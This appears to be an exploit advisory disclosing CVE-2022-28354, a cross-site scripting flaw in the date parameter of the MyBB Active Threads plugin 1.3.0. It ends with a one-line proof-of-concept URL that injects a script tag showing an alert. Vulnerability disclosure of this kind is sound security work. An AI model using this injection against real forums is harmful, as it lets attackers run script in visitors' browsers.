Authored by 0xB9

MyBB Active Threads plugin version 1.3.0 suffers from a cross site scripting vulnerability.

advisories | CVE-2022-28354

# Exploit Title: MyBB Active Threads Plugin 1.3.0 – Cross-Site Scripting
# Date: February 9, 2022
# Author: 0xB9
# Twitter: @0xB9sec
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1336
# Version: 1.3.0
# Tested On: Windows 10
# CVE: CVE-2022-28354

Description:
This plugin shows a page of active threads. The date parameter is vulnerable to XSS when setting a time period.

Proof of Concept:
activethreads.php?days=7&hours=0&mins=0&date=”><script>alert(1)</script>